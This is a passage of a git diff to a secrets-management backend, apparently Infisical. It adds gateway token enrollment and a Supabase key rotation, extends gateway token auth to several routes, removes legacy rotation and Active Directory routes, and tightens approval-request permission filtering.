a/backend/src/ee/routes/v1/pam-resource-routers/pam-resource-endpoints.ts b/backend/src/ee/routes/v1/pam-resource-routers/pam-resource-endpoints.ts index a9d89327b95..486a6a13ee0 100644 --- a/backend/src/ee/routes/v1/pam-resource-routers/pam-resource-endpoints.ts +++ b/backend/src/ee/routes/v1/pam-resource-routers/pam-resource-endpoints.ts @@ -3,7 +3,6 @@ import { z } from "zod"; import { EventType } from "@app/ee/services/audit-log/audit-log-types"; import { PamResource } from "@app/ee/services/pam-resource/pam-resource-enums"; import { TPamResource } from "@app/ee/services/pam-resource/pam-resource-types"; -import { SanitizedWindowsResourceSchema } from "@app/ee/services/pam-resource/windows-server/windows-server-resource-schemas"; import { readLimit, writeLimit } from "@app/server/config/rateLimiter"; import { getTelemetryDistinctId } from "@app/server/lib/telemetry"; import { verifyAuth } from "@app/server/plugins/auth/verify-auth"; @@ -360,31 +359,3 @@ echo "" } }); }; - -export const registerActiveDirectoryRelatedResourcesEndpoint = (server: FastifyZodProvider) => { - server.route({ - method: "GET", - url: "/:resourceId/related-resources", - config: { - rateLimit: readLimit - }, - schema: { - operationId: "getActiveDirectoryRelatedResources", - description: "List resources that belong to this Active Directory domain", - params: z.object({ - resourceId: z.string().uuid() - }), - response: { - 200: z.object({ - resources: SanitizedWindowsResourceSchema.array() - }) - } - }, - onRequest: verifyAuth([AuthMode.JWT]), - handler: async (req) => { - const resources = await server.services.pamResource.listRelatedResources(req.params.resourceId, req.permission); - - return { resources }; - } - }); -}; diff --git a/backend/src/ee/routes/v1/pam-resource-routers/pam-resource-router.ts b/backend/src/ee/routes/v1/pam-resource-routers/pam-resource-router.ts index 4550328310a..6726a6db9cd 100644 --- a/backend/src/ee/routes/v1/pam-resource-routers/pam-resource-router.ts +++ b/backend/src/ee/routes/v1/pam-resource-routers/pam-resource-router.ts @@ -2,10 +2,6 @@ import { z } from "zod"; import { PamAccountDependenciesSchema } from "@app/db/schemas"; import { EventType } from "@app/ee/services/audit-log/audit-log-types"; -import { - ActiveDirectoryResourceListItemSchema, - SanitizedActiveDirectoryResourceSchema -} from "@app/ee/services/pam-resource/active-directory/active-directory-resource-schemas"; import { AwsIamResourceListItemSchema, SanitizedAwsIamResourceSchema @@ -58,8 +54,7 @@ const SanitizedResourceSchema = z.discriminatedUnion("resourceType", [ SanitizedAwsIamResourceSchema, SanitizedMongoDBResourceSchema, SanitizedRedisResourceSchema, - SanitizedWindowsResourceSchema, - SanitizedActiveDirectoryResourceSchema + SanitizedWindowsResourceSchema ]); const SanitizedResourceWithFavoriteSchema = z.intersection( @@ -76,8 +71,7 @@ const ResourceOptionsSchema = z.discriminatedUnion("resource", [ AwsIamResourceListItemSchema, MongoDBResourceListItemSchema, RedisResourceListItemSchema, - WindowsResourceListItemSchema, - ActiveDirectoryResourceListItemSchema + WindowsResourceListItemSchema ]); export const registerPamResourceRouter = async (server: FastifyZodProvider) => { diff --git a/backend/src/ee/routes/v1/pam-session-router.ts b/backend/src/ee/routes/v1/pam-session-router.ts index 3e491cd51a0..d894aa3dac6 100644 --- a/backend/src/ee/routes/v1/pam-session-router.ts +++ b/backend/src/ee/routes/v1/pam-session-router.ts @@ -56,7 +56,7 @@ export const registerPamSessionRouter = async (server: FastifyZodProvider) => { }) } }, - onRequest: verifyAuth([AuthMode.IDENTITY_ACCESS_TOKEN]), + onRequest: verifyAuth([AuthMode.IDENTITY_ACCESS_TOKEN, AuthMode.GATEWAY_ACCESS_TOKEN]), handler: async (req) => { const { credentials, policyRules, projectId, account, sessionStarted } = await server.services.pamAccount.getSessionCredentials(req.params.sessionId, req.permission); @@ -130,7 +130,7 @@ export const registerPamSessionRouter = async (server: FastifyZodProvider) => { }) } }, - onRequest: verifyAuth([AuthMode.IDENTITY_ACCESS_TOKEN]), + onRequest: verifyAuth([AuthMode.IDENTITY_ACCESS_TOKEN, AuthMode.GATEWAY_ACCESS_TOKEN]), handler: async (req) => { const { session, projectId } = await server.services.pamSession.updateLogsById( { @@ -177,7 +177,7 @@ export const registerPamSessionRouter = async (server: FastifyZodProvider) => { }) } }, - onRequest: verifyAuth([AuthMode.JWT, AuthMode.IDENTITY_ACCESS_TOKEN]), + onRequest: verifyAuth([AuthMode.JWT, AuthMode.IDENTITY_ACCESS_TOKEN, AuthMode.GATEWAY_ACCESS_TOKEN]), handler: async (req) => { const { session, projectId, alreadyEnded } = await server.services.pamSession.endSessionById( req.params.sessionId, @@ -384,7 +384,7 @@ export const registerPamSessionRouter = async (server: FastifyZodProvider) => { 200: z.object({ ok: z.literal(true) }) } }, - onRequest: verifyAuth([AuthMode.IDENTITY_ACCESS_TOKEN]), + onRequest: verifyAuth([AuthMode.IDENTITY_ACCESS_TOKEN, AuthMode.GATEWAY_ACCESS_TOKEN]), handler: async (req) => { const EventBatchSchema = z.array(z.union([PamSessionCommandLogSchema, TerminalEventSchema, HttpEventSchema])); try { diff --git a/backend/src/ee/routes/v1/project-template-router.ts b/backend/src/ee/routes/v1/project-template-router.ts index 3f5c58e9cfe..10bf1d0b571 100644 --- a/backend/src/ee/routes/v1/project-template-router.ts +++ b/backend/src/ee/routes/v1/project-template-router.ts @@ -17,7 +17,7 @@ const isReservedRoleSlug = (slug: string) => Object.values(ProjectMembershipRole).includes(slug as ProjectMembershipRole); const isReservedRoleName = (name: string) => - ["custom", "admin", "viewer", "developer", "no access"].includes(name.toLowerCase()); + ["custom", "admin", "viewer", "member", "no access"].includes(name.toLowerCase()); const SanitizedProjectTemplateSchema = ProjectTemplatesSchema.extend({ roles: z diff --git a/backend/src/ee/routes/v1/relay-router.ts b/backend/src/ee/routes/v1/relay-router.ts index 89b2a9531bf..66e6640e45c 100644 --- a/backend/src/ee/routes/v1/relay-router.ts +++ b/backend/src/ee/routes/v1/relay-router.ts @@ -114,7 +114,7 @@ export const registerRelayRouter = async (server: FastifyZodProvider) => { config: { rateLimit: readLimit }, - onRequest: verifyAuth([AuthMode.JWT, AuthMode.IDENTITY_ACCESS_TOKEN]), + onRequest: verifyAuth([AuthMode.JWT, AuthMode.IDENTITY_ACCESS_TOKEN, AuthMode.GATEWAY_ACCESS_TOKEN]), handler: async (req) => { return server.services.relay.getRelays({ actorId: req.permission.id, diff --git a/backend/src/ee/routes/v1/secret-approval-request-router.ts b/backend/src/ee/routes/v1/secret-approval-request-router.ts index 1822e53ed23..19a26d6d6ee 100644 --- a/backend/src/ee/routes/v1/secret-approval-request-router.ts +++ b/backend/src/ee/routes/v1/secret-approval-request-router.ts @@ -133,7 +133,7 @@ export const registerSecretApprovalRequestRouter = async (server: FastifyZodProv id: z.string() }), body: z.object({ - bypassReason: z.string().optional() + bypassReason: z.string().max(1000).optional() }), response: { 200: z.object({ diff --git a/backend/src/ee/routes/v1/secret-rotation-provider-router.ts b/backend/src/ee/routes/v1/secret-rotation-provider-router.ts deleted file mode 100644 index e6a1ac72bcc..00000000000 --- a/backend/src/ee/routes/v1/secret-rotation-provider-router.ts +++ /dev/null @@ -1,45 +0,0 @@ -import { z } from "zod"; - -import { readLimit } from "@app/server/config/rateLimiter"; -import { verifyAuth } from "@app/server/plugins/auth/verify-auth"; -import { AuthMode } from "@app/services/auth/auth-type"; - -export const registerSecretRotationProviderRouter = async (server: FastifyZodProvider) => { - server.route({ - method: "GET", - url: "/:workspaceId", - config: { - rateLimit: readLimit - }, - schema: { - params: z.object({ - workspaceId: z.string().trim() - }), - response: { - 200: z.object({ - providers: z - .object({ - name: z.string(), - title: z.string(), - image: z.string().optional(), - description: z.string().optional(), - template: z.any(), - isDeprecated: z.boolean().optional() - }) - .array() - }) - } - }, - onRequest: verifyAuth([AuthMode.JWT]), - handler: async (req) => { - const providers = await server.services.secretRotation.getProviderTemplates({ - actor: req.permission.type, - actorId: req.permission.id, - actorAuthMethod: req.permission.authMethod, - actorOrgId: req.permission.orgId, - projectId: req.params.workspaceId - }); - return providers; - } - }); -}; diff --git a/backend/src/ee/routes/v1/secret-rotation-router.ts b/backend/src/ee/routes/v1/secret-rotation-router.ts deleted file mode 100644 index 936459fa162..00000000000 --- a/backend/src/ee/routes/v1/secret-rotation-router.ts +++ /dev/null @@ -1,176 +0,0 @@ -import { z } from "zod"; - -import { SecretRotationOutputsSchema, SecretRotationsSchema } from "@app/db/schemas"; -import { removeTrailingSlash } from "@app/lib/fn"; -import { readLimit, writeLimit } from "@app/server/config/rateLimiter"; -import { verifyAuth } from "@app/server/plugins/auth/verify-auth"; -import { AuthMode } from "@app/services/auth/auth-type"; - -export const registerSecretRotationRouter = async (server: FastifyZodProvider) => { - server.route({ - method: "POST", - url: "/", - config: { - rateLimit: writeLimit - }, - schema: { - body: z.object({ - workspaceId: z.string().trim(), - secretPath: z.string().trim().transform(removeTrailingSlash), - environment: z.string().trim(), - interval: z.number().min(1), - provider: z.string().trim(), - customProvider: z.string().trim().optional(), - inputs: z.record(z.unknown()), - outputs: z.record(z.string()) - }), - response: { - 200: z.object({ - secretRotation: SecretRotationsSchema.merge( - z.object({ - environment: z.object({ - id: z.string(), - name: z.string(), - slug: z.string() - }), - outputs: SecretRotationOutputsSchema.array() - }) - ) - }) - } - }, - onRequest: verifyAuth([AuthMode.JWT]), - handler: async (req) => { - const secretRotation = await server.services.secretRotation.createRotation({ - actor: req.permission.type, - actorAuthMethod: req.permission.authMethod, - actorId: req.permission.id, - actorOrgId: req.permission.orgId, - ...req.body, - projectId: req.body.workspaceId - }); - return { secretRotation }; - } - }); - - server.route({ - url: "/restart", - method: "POST", - config: { - rateLimit: writeLimit - }, - schema: { - body: z.object({ - id: z.string().trim() - }), - response: { - 200: z.object({ - secretRotation: SecretRotationsSchema.merge( - z.object({ - environment: z.object({ - id: z.string(), - name: z.string(), - slug: z.string() - }) - }) - ) - }) - } - }, - onRequest: verifyAuth([AuthMode.JWT]), - handler: async (req) => { - const secretRotation = await server.services.secretRotation.restartById({ - actor: req.permission.type, - actorId: req.permission.id, - actorAuthMethod: req.permission.authMethod, - actorOrgId: req.permission.orgId, - rotationId: req.body.id - }); - return { secretRotation }; - } - }); - - server.route({ - url: "/", - method: "GET", - config: { - rateLimit: readLimit - }, - schema: { - querystring: z.object({ - workspaceId: z.string().trim() - }), - response: { - 200: z.object({ - secretRotations: SecretRotationsSchema.merge( - z.object({ - environment: z.object({ - id: z.string(), - name: z.string(), - slug: z.string() - }), - outputs: z - .object({ - key: z.string(), - secret: z.object({ - secretKey: z.string(), - id: z.string(), - version: z.number() - }) - }) - .array() - }) - ).array() - }) - } - }, - onRequest: verifyAuth([AuthMode.JWT]), - handler: async (req) => { - const secretRotations = await server.services.secretRotation.getByProjectId({ - actor: req.permission.type, - actorId: req.permission.id, - actorAuthMethod: req.permission.authMethod, - actorOrgId: req.permission.orgId, - projectId: req.query.workspaceId - }); - return { secretRotations }; - } - }); - - server.route({ - method: "DELETE", - url: "/:id", - config: { - rateLimit: writeLimit - }, - schema: { - params: z.object({ - id: z.string().trim() - }), - response: { - 200: z.object({ - secretRotation: SecretRotationsSchema.merge( - z.object({ - environment: z.object({ - id: z.string(), - name: z.string(), - slug: z.string() - }) - }) - ) - }) - } - }, - onRequest: verifyAuth([AuthMode.JWT]), - handler: async (req) => { - const secretRotation = await server.services.secretRotation.deleteById({ - actor: req.permission.type, - actorId: req.permission.id, - actorAuthMethod: req.permission.authMethod, - actorOrgId: req.permission.orgId, - rotationId: req.params.id - }); - return { secretRotation }; - } - }); -}; diff --git a/backend/src/ee/routes/v1/secret-version-router.ts b/backend/src/ee/routes/v1/secret-version-router.ts index a09a05c91a1..2c768fb0eb5 100644 --- a/backend/src/ee/routes/v1/secret-version-router.ts +++ b/backend/src/ee/routes/v1/secret-version-router.ts @@ -18,7 +18,7 @@ export const registerSecretVersionRouter = async (server: FastifyZodProvider) => }), querystring: z.object({ offset: z.coerce.number(), - limit: z.coerce.number() + limit: z.coerce.number().max(1000) }), response: { 200: z.object({ diff --git a/backend/src/ee/routes/v2/gateway-router.ts b/backend/src/ee/routes/v2/gateway-router.ts index f72ec9b3f46..ccf9d5e3a0f 100644 --- a/backend/src/ee/routes/v2/gateway-router.ts +++ b/backend/src/ee/routes/v2/gateway-router.ts @@ -47,17 +47,16 @@ export const registerGatewayV2Router = async (server: FastifyZodProvider) => { config: { rateLimit: writeLimit }, - onRequest: verifyAuth([AuthMode.IDENTITY_ACCESS_TOKEN]), + onRequest: verifyAuth([AuthMode.IDENTITY_ACCESS_TOKEN, AuthMode.GATEWAY_ACCESS_TOKEN]), handler: async (req) => { - const gateway = await server.services.gatewayV2.registerGateway({ + return server.services.gatewayV2.registerGateway({ orgId: req.permission.orgId, relayName: req.body.relayName, actorId: req.permission.id, + actorType: req.permission.type, actorAuthMethod: req.permission.authMethod, name: req.body.name }); - - return gateway; } }); @@ -75,7 +74,7 @@ export const registerGatewayV2Router = async (server: FastifyZodProvider) => { }) } }, - onRequest: verifyAuth([AuthMode.IDENTITY_ACCESS_TOKEN]), + onRequest: verifyAuth([AuthMode.IDENTITY_ACCESS_TOKEN, AuthMode.GATEWAY_ACCESS_TOKEN]), handler: async (req) => { await server.services.gatewayV2.heartbeat({ orgPermission: req.permission @@ -92,11 +91,9 @@ export const registerGatewayV2Router = async (server: FastifyZodProvider) => { operationId: "listGateways", response: { 200: SanitizedGatewayV2Schema.extend({ - identity: z.object({ - name: z.string(), - id: z.string() - }), - connectedResourcesCount: z.number() + identity: z.object({ name: z.string(), id: z.string() }).nullable(), + connectedResourcesCount: z.number(), + enrollmentTokenStatus: z.enum(["pending", "expired"]).nullable() }).array() } }, @@ -178,7 +175,7 @@ export const registerGatewayV2Router = async (server: FastifyZodProvider) => { 200: zodBuffer } }, - onRequest: verifyAuth([AuthMode.IDENTITY_ACCESS_TOKEN]), + onRequest: verifyAuth([AuthMode.IDENTITY_ACCESS_TOKEN, AuthMode.GATEWAY_ACCESS_TOKEN]), handler: async (req) => { const pamSessionKey = await server.services.gatewayV2.getPamSessionKey({ orgPermission: req.permission diff --git a/backend/src/ee/routes/v2/secret-rotation-v2-routers/index.ts b/backend/src/ee/routes/v2/secret-rotation-v2-routers/index.ts index cfc80dca09f..07cef7ba2c5 100644 --- a/backend/src/ee/routes/v2/secret-rotation-v2-routers/index.ts +++ b/backend/src/ee/routes/v2/secret-rotation-v2-routers/index.ts @@ -15,6 +15,7 @@ import { registerOpenRouterApiKeyRotationRouter } from "./open-router-api-key-ro import { registerOracleDBCredentialsRotationRouter } from "./oracledb-credentials-rotation-router"; import { registerPostgresCredentialsRotationRouter } from "./postgres-credentials-rotation-router"; import { registerRedisCredentialsRotationRouter } from "./redis-credentials-rotation-router"; +import { registerSupabaseApiKeyRotationRouter } from "./supabase-api-key-rotation-router"; import { registerUnixLinuxLocalAccountRotationRouter } from "./unix-linux-local-account-rotation-router"; import { registerWindowsLocalAccountRotationRouter } from "./windows-local-account-rotation-router"; @@ -40,5 +41,6 @@ export const SECRET_ROTATION_REGISTER_ROUTER_MAP: Record< [SecretRotation.DbtServiceToken]: registerDbtServiceTokenRotationRouter, [SecretRotation.WindowsLocalAccount]: registerWindowsLocalAccountRotationRouter, [SecretRotation.OpenRouterApiKey]: registerOpenRouterApiKeyRotationRouter, - [SecretRotation.HpIloLocalAccount]: registerHpIloRotationRouter + [SecretRotation.HpIloLocalAccount]: registerHpIloRotationRouter, + [SecretRotation.SupabaseApiKey]: registerSupabaseApiKeyRotationRouter }; diff --git a/backend/src/ee/routes/v2/secret-rotation-v2-routers/secret-rotation-v2-endpoints.ts b/backend/src/ee/routes/v2/secret-rotation-v2-routers/secret-rotation-v2-endpoints.ts index de8d27e2ec0..08a305576b5 100644 --- a/backend/src/ee/routes/v2/secret-rotation-v2-routers/secret-rotation-v2-endpoints.ts +++ b/backend/src/ee/routes/v2/secret-rotation-v2-routers/secret-rotation-v2-endpoints.ts @@ -452,6 +452,62 @@ export const registerSecretRotationEndpoints = < } }); + server.route({ + method: "POST", + url: "/:rotationId/move", + config: { + rateLimit: writeLimit + }, + schema: { + hide: false, + operationId: `move${rotationTypeId}Rotation`, + tags: [ApiDocsTags.SecretRotations], + description: `Move the specified ${rotationType} Rotation to a different secret path or environment.`, + params: z.object({ + rotationId: z.string().uuid().describe(SecretRotations.UPDATE(type).rotationId) + }), + body: z.object({ + destinationEnvironment: z.string().trim().min(1, "Destination environment required"), + destinationSecretPath: z.string().trim().min(1, "Destination secret path required"), + overwriteDestination: z.boolean().default(false) + }), + response: { + 200: z.object({ secretRotation: responseSchema }) + } + }, + onRequest: verifyAuth([AuthMode.JWT, AuthMode.IDENTITY_ACCESS_TOKEN]), + handler: async (req) => { + const { rotationId } = req.params; + const { destinationEnvironment, destinationSecretPath, overwriteDestination } = req.body; + + const { secretRotation, sourceEnvironment, sourceSecretPath } = + await server.services.secretRotationV2.moveSecretRotation( + { rotationId, type, destinationEnvironment, destinationSecretPath, overwriteDestination }, + req.permission + ); + + const movedRotation = secretRotation as T; + + await server.services.auditLog.createAuditLog({ + ...req.auditLogInfo, + projectId: movedRotation.projectId, + event: { + type: EventType.MOVE_SECRET_ROTATION, + metadata: { + type, + rotationId, + sourceEnvironment, + sourceSecretPath, + destinationEnvironment, + destinationSecretPath + } + } + }); + + return { secretRotation: movedRotation }; + } + }); + server.route({ method: "POST", url: "/:rotationId/rotate-secrets", diff --git a/backend/src/ee/routes/v2/secret-rotation-v2-routers/secret-rotation-v2-router.ts b/backend/src/ee/routes/v2/secret-rotation-v2-routers/secret-rotation-v2-router.ts index bea58740206..e5ff3d6d48c 100644 --- a/backend/src/ee/routes/v2/secret-rotation-v2-routers/secret-rotation-v2-router.ts +++ b/backend/src/ee/routes/v2/secret-rotation-v2-routers/secret-rotation-v2-router.ts @@ -17,6 +17,7 @@ import { OracleDBCredentialsRotationListItemSchema } from "@app/ee/services/secr import { PostgresCredentialsRotationListItemSchema } from "@app/ee/services/secret-rotation-v2/postgres-credentials"; import { RedisCredentialsRotationListItemSchema } from "@app/ee/services/secret-rotation-v2/redis-credentials"; import { SecretRotationV2Schema } from "@app/ee/services/secret-rotation-v2/secret-rotation-v2-union-schema"; +import { SupabaseApiKeyRotationListItemSchema } from "@app/ee/services/secret-rotation-v2/supabase-api-key"; import { UnixLinuxLocalAccountRotationListItemSchema } from "@app/ee/services/secret-rotation-v2/unix-linux-local-account-rotation"; import { WindowsLocalAccountRotationListItemSchema } from "@app/ee/services/secret-rotation-v2/windows-local-account-rotation"; import { ApiDocsTags, SecretRotations } from "@app/lib/api-docs"; @@ -41,7 +42,8 @@ const SecretRotationV2OptionsSchema = z.discriminatedUnion("type", [ DbtServiceTokenRotationListItemSchema, WindowsLocalAccountRotationListItemSchema, OpenRouterApiKeyRotationListItemSchema, - HpIloRotationListItemSchema + HpIloRotationListItemSchema, + SupabaseApiKeyRotationListItemSchema ]); export const registerSecretRotationV2Router = async (server: FastifyZodProvider) => { diff --git a/backend/src/ee/routes/v2/secret-rotation-v2-routers/supabase-api-key-rotation-router.ts b/backend/src/ee/routes/v2/secret-rotation-v2-routers/supabase-api-key-rotation-router.ts new file mode 100644 index 00000000000..d16fabb7e0b --- /dev/null +++ b/backend/src/ee/routes/v2/secret-rotation-v2-routers/supabase-api-key-rotation-router.ts @@ -0,0 +1,19 @@ +import { SecretRotation } from "@app/ee/services/secret-rotation-v2/secret-rotation-v2-enums"; +import { + CreateSupabaseApiKeyRotationSchema, + SupabaseApiKeyRotationGeneratedCredentialsSchema, + SupabaseApiKeyRotationSchema, + UpdateSupabaseApiKeyRotationSchema +} from "@app/ee/services/secret-rotation-v2/supabase-api-key"; + +import { registerSecretRotationEndpoints } from "./secret-rotation-v2-endpoints"; + +export const registerSupabaseApiKeyRotationRouter = async (server: FastifyZodProvider) => + registerSecretRotationEndpoints({ + type: SecretRotation.SupabaseApiKey, + server, + responseSchema: SupabaseApiKeyRotationSchema, + createSchema: CreateSupabaseApiKeyRotationSchema, + updateSchema: UpdateSupabaseApiKeyRotationSchema, + generatedCredentialsSchema: SupabaseApiKeyRotationGeneratedCredentialsSchema + }); diff --git a/backend/src/ee/routes/v3/gateway-router.ts b/backend/src/ee/routes/v3/gateway-router.ts new file mode 100644 index 00000000000..eea110b64f3 --- /dev/null +++ b/backend/src/ee/routes/v3/gateway-router.ts @@ -0,0 +1,186 @@ +import z from "zod"; + +import { GatewaysV2Schema } from "@app/db/schemas"; +import { EventType, UserAgentType } from "@app/ee/services/audit-log/audit-log-types"; +import { writeLimit } from "@app/server/config/rateLimiter"; +import { slugSchema } from "@app/server/lib/schemas"; +import { verifyAuth } from "@app/server/plugins/auth/verify-auth"; +import { ActorType, AuthMode } from "@app/services/auth/auth-type"; + +const enrollRateLimit = { windowMs: 60 * 1000, max: 10 }; + +const SanitizedGatewayV2Schema = GatewaysV2Schema.pick({ + id: true, + identityId: true, + name: true, + createdAt: true, + updatedAt: true, + heartbeat: true, + lastHealthCheckStatus: true +}); + +export const registerGatewayV3Router = async (server: FastifyZodProvider) => { + // Create a gateway + server.route({ + method: "POST", + url: "/", + config: { rateLimit: writeLimit }, + schema: { + operationId: "createGateway", + body: z.object({ + name: slugSchema({ min: 1, max: 64, field: "name" }) + }), + response: { + 200: SanitizedGatewayV2Schema + } + }, + onRequest: verifyAuth([AuthMode.JWT, AuthMode.IDENTITY_ACCESS_TOKEN]), + handler: async (req) => { + const gateway = await server.services.gatewayV2.createGateway({ + orgId: req.permission.orgId, + actorId: req.permission.id, + actorType: req.permission.type, + actorAuthMethod: req.permission.authMethod, + name: req.body.name + }); + + await server.services.auditLog.createAuditLog({ + ...req.auditLogInfo, + orgId: req.permission.orgId, + event: { + type: EventType.GATEWAY_CREATE, + metadata: { + gatewayId: gateway.id, + name: req.body.name + } + } + }); + + return gateway; + } + }); + + // Generate enrollment token for a gateway + server.route({ + method: "POST", + url: "/:gatewayId/token-auth/configure", + config: { rateLimit: writeLimit }, + schema: { + operationId: "configureGatewayTokenAuth", + params: z.object({ + gatewayId: z.string().uuid() + }), + response: { + 200: z.object({ + token: z.string(), + expiresAt: z.date() + }) + } + }, + onRequest: verifyAuth([AuthMode.JWT, AuthMode.IDENTITY_ACCESS_TOKEN]), + handler: async (req) => { + const result = await server.services.gatewayV2.configureTokenAuth({ + orgPermission: req.permission, + gatewayId: req.params.gatewayId + }); + + await server.services.auditLog.createAuditLog({ + ...req.auditLogInfo, + orgId: req.permission.orgId, + event: { + type: EventType.GATEWAY_ENROLLMENT_TOKEN_CREATE, + metadata: { + tokenId: result.id, + name: result.gatewayName + } + } + }); + + return { token: result.token, expiresAt: result.expiresAt }; + } + }); + + // Enroll a gateway using a token (unauthenticated) + server.route({ + method: "POST", + url: "/token-auth/enroll", + config: { rateLimit: enrollRateLimit }, + schema: { + operationId: "enrollGatewayWithToken", + body: z.object({ + token: z.string().min(1) + }), + response: { + 200: z.object({ + accessToken: z.string(), + gatewayId: z.string() + }) + } + }, + handler: async (req) => { + const result = await server.services.gatewayV2.enrollGateway({ + token: req.body.token + }); + + await server.services.auditLog + .createAuditLog({ + orgId: result.orgId, + actor: { + type: ActorType.GATEWAY, + metadata: { gatewayId: result.gatewayId } + }, + event: { + type: EventType.GATEWAY_ENROLL, + metadata: { + gatewayId: result.gatewayId, + name: result.gatewayName + } + }, + ipAddress: req.ip, + userAgent: req.headers["user-agent"] ?? "", + userAgentType: UserAgentType.CLI + }) + .catch(() => {}); + + return result; + } + }); + + // Connect (refresh certs) for an enrolled gateway + server.route({ + method: "POST", + url: "/connect", + config: { rateLimit: writeLimit }, + schema: { + operationId: "connectGateway", + body: z.object({ + relayName: slugSchema({ min: 1, max: 32, field: "relayName" }).optional() + }), + response: { + 200: z.object({ + gatewayId: z.string(), + relayHost: z.string(), + pki: z.object({ + serverCertificate: z.string(), + serverPrivateKey: z.string(), + clientCertificateChain: z.string() + }), + ssh: z.object({ + clientCertificate: z.string(), + clientPrivateKey: z.string(), + serverCAPublicKey: z.string() + }) + }) + } + }, + onRequest: verifyAuth([AuthMode.GATEWAY_ACCESS_TOKEN]), + handler: async (req) => { + return server.services.gatewayV2.connectGateway({ + orgId: req.permission.orgId, + actorId: req.permission.id, + actorType: req.permission.type, + relayName: req.body.relayName + }); + } + }); +}; diff --git a/backend/src/ee/routes/v3/index.ts b/backend/src/ee/routes/v3/index.ts new file mode 100644 index 00000000000..84514752a00 --- /dev/null +++ b/backend/src/ee/routes/v3/index.ts @@ -0,0 +1,5 @@ +import { registerGatewayV3Router } from "./gateway-router"; + +export const registerV3EERoutes = async (server: FastifyZodProvider) => { + await server.register(registerGatewayV3Router, { prefix: "/gateways" }); +}; diff --git a/backend/src/ee/services/access-approval-request/access-approval-request-dal.ts b/backend/src/ee/services/access-approval-request/access-approval-request-dal.ts index 1fd0bd7b287..996afb62ee7 100644 --- a/backend/src/ee/services/access-approval-request/access-approval-request-dal.ts +++ b/backend/src/ee/services/access-approval-request/access-approval-request-dal.ts @@ -260,7 +260,7 @@ export interface TAccessApprovalRequestDALFactory extends Omit; - getCount: ({ projectId }: { projectId: string; policyId?: string }) => Promise<{ + getCount: ({ projectId }: { projectId: string; policyId?: string; requestedByUserId?: string }) => Promise<{ pendingCount: number; finalizedCount: number; }>; @@ -872,7 +872,7 @@ export const accessApprovalRequestDALFactory = (db: TDbClient): TAccessApprovalR } }; - const getCount: TAccessApprovalRequestDALFactory["getCount"] = async ({ projectId, policyId }) => { + const getCount: TAccessApprovalRequestDALFactory["getCount"] = async ({ projectId, policyId, requestedByUserId }) => { try { const accessRequests = await db .replicaNode()(TableName.AccessApprovalRequest) @@ -895,7 +895,12 @@ export const accessApprovalRequestDALFactory = (db: TDbClient): TAccessApprovalR ) .where(`${TableName.Environment}.projectId`, projectId) .where((qb) => { - if (policyId) void qb.where(`${TableName.AccessApprovalPolicy}.id`, policyId); + if (policyId) { + void qb.where(`${TableName.AccessApprovalPolicy}.id`, policyId); + } + if (requestedByUserId) { + void qb.where(`${TableName.AccessApprovalRequest}.requestedByUserId`, requestedByUserId); + } }) .select(selectAllTableCols(TableName.AccessApprovalRequest)) .select(db.ref("status").withSchema(TableName.AccessApprovalRequestReviewer).as("reviewerStatus")) diff --git a/backend/src/ee/services/access-approval-request/access-approval-request-service.ts b/backend/src/ee/services/access-approval-request/access-approval-request-service.ts index 9450737f101..aa81b0be873 100644 --- a/backend/src/ee/services/access-approval-request/access-approval-request-service.ts +++ b/backend/src/ee/services/access-approval-request/access-approval-request-service.ts @@ -8,6 +8,8 @@ import { BadRequestError, ForbiddenRequestError, NotFoundError } from "@app/lib/ import { groupBy } from "@app/lib/fn"; import { ms } from "@app/lib/ms"; import { alphaNumericNanoId } from "@app/lib/nanoid"; +import { requestMemoKeys } from "@app/lib/request-context/memo-keys"; +import { requestMemoize } from "@app/lib/request-context/request-memoizer"; import { EnforcementLevel } from "@app/lib/types"; import { triggerWorkflowIntegrationNotification } from "@app/lib/workflow-integrations/trigger-notification"; import { TriggerFeature } from "@app/lib/workflow-integrations/types"; @@ -27,7 +29,11 @@ import { TAccessApprovalPolicyApproverDALFactory } from "../access-approval-poli import { TAccessApprovalPolicyDALFactory } from "../access-approval-policy/access-approval-policy-dal"; import { TGroupDALFactory } from "../group/group-dal"; import { TPermissionServiceFactory } from "../permission/permission-service-types"; -import { ProjectPermissionMemberActions, ProjectPermissionSub } from "../permission/project-permission"; +import { + ProjectPermissionApprovalRequestActions, + ProjectPermissionMemberActions, + ProjectPermissionSub +} from "../permission/project-permission"; import { TAccessApprovalRequestDALFactory } from "./access-approval-request-dal"; import { verifyRequestedPermissions } from "./access-approval-request-fns"; import { TAccessApprovalRequestReviewerDALFactory } from "./access-approval-request-reviewer-dal"; @@ -35,7 +41,7 @@ import { ApprovalStatus, TAccessApprovalRequestServiceFactory } from "./access-a type TSecretApprovalRequestServiceFactoryDep = { additionalPrivilegeDAL: Pick; - permissionService: Pick; + permissionService: Pick; accessApprovalPolicyApproverDAL: Pick; projectEnvDAL: Pick; projectDAL: Pick< @@ -339,7 +345,9 @@ export const accessApprovalRequestServiceFactory = ({ throw new ForbiddenRequestError({ message: "You are not authorized to modify this request" }); } - const project = await projectDAL.findById(accessApprovalRequest.projectId); + const project = await requestMemoize(requestMemoKeys.projectFindById(accessApprovalRequest.projectId), () => + projectDAL.findById(accessApprovalRequest.projectId) + ); if (!project) { throw new NotFoundError({ @@ -365,6 +373,14 @@ export const accessApprovalRequestServiceFactory = ({ } } + if (policy.maxTimePeriod) { + if (ms(temporaryRange) > ms(policy.maxTimePeriod)) { + throw new BadRequestError({ + message: `Requested access time range is limited to ${policy.maxTimePeriod} by policy` + }); + } + } + let envSlug = "unknown"; let secretPath = "/"; let accessTypes: string[] = []; @@ -490,7 +506,7 @@ export const accessApprovalRequestServiceFactory = ({ const project = await projectDAL.findProjectBySlug(projectSlug, actorOrgId); if (!project) throw new NotFoundError({ message: `Project with slug '${projectSlug}' not found` }); - await permissionService.getProjectPermission({ + const { permission } = await permissionService.getProjectPermission({ actor, actorId, projectId: project.id, @@ -499,9 +515,18 @@ export const accessApprovalRequestServiceFactory = ({ actionProjectType: ActionProjectType.SecretManager }); + const canReadAllApprovalRequests = permission.can( + ProjectPermissionApprovalRequestActions.Read, + ProjectPermissionSub.ApprovalRequests + ); + const policies = await accessApprovalPolicyDAL.find({ projectId: project.id }); let requests = await accessApprovalRequestDAL.findRequestsWithPrivilegeByPolicyIds(policies.map((p) => p.id)); + if (!canReadAllApprovalRequests) { + requests = requests.filter((request) => request.requestedByUserId === actorId); + } + if (authorUserId) { requests = requests.filter((request) => request.requestedByUserId === authorUserId); } @@ -610,7 +635,9 @@ export const accessApprovalRequestServiceFactory = ({ throw new ForbiddenRequestError({ message: "You are not authorized to approve this request" }); } - const project = await projectDAL.findById(accessApprovalRequest.projectId); + const 